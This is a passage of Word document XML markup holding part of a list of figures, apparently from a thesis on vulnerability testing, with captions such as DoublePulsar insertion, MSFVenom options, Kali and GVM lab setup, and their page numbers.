            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 34: SMB_COM_TRANSACTION2_SECONDARY is used</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981759 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11091346" w14:textId="2C6084D5"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60" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 35: Insertion of DoublePulsar</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981760 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24352AF0" w14:textId="34A18D37"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61" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 36: HandlerFunction executes shellcode</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981761 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26BD101B" w14:textId="5D1F463F"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62" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 37: Apache Tomcat Server [45]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981762 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E1FAA42" w14:textId="30961C71"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63" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 38: MSFVenom options [49]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981763 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5FD386A2" w14:textId="39812B4F"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64" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 39: The interconnection of worldviews, design, and research methods [52]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981764 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50E0DAD4" w14:textId="32C570F0"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65" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 40: Four Worldviews [52]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981765 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D37D905" w14:textId="6B9E9A0C"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66" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 41: Virtual Machine using Forticlient VPN</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981766 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="428D8522" w14:textId="1F230AB7"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67" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 42: Virtual Machine Testbed</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981767 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A394DE8" w14:textId="353DBA6D"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68" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 43: FortiClient VPN connection</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981768 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>63</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="136E8DFB" w14:textId="6D6CAF06"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69" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 44: Kali Virtual Machine</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981769 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>64</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1349A1B7" w14:textId="35CC2DD5"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70" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 45: Bridged Adapter Network 1</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981770 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>65</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0ACDA08E" w14:textId="2BF42978"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71" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 46: NAT Adapter Network 2</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981771 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>65</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D952E79" w14:textId="6019BD59"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72" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 47: Installation of GVM</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981772 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>66</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F2484FE" w14:textId="4E4180FC"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73" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 48: Check GVM Setup</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981773 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>66</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="270EBE1F" w14:textId="4C4735CF"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74" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 49: Kali Update and Upgrade</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981774 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BA0676D" w14:textId="7FC59E6B"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75" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 50: GVM Database Update</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981775 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53ACBB54" w14:textId="5F816979"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76" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 51: GVM Start</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981776 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>68</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="249B73BD" w14:textId="6F2D887E"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77" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 52: GVM start on command line</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981777 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>68</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AB3D48D" w14:textId="0D6F7173"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78" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 53: GVM opening web browser</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981778 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
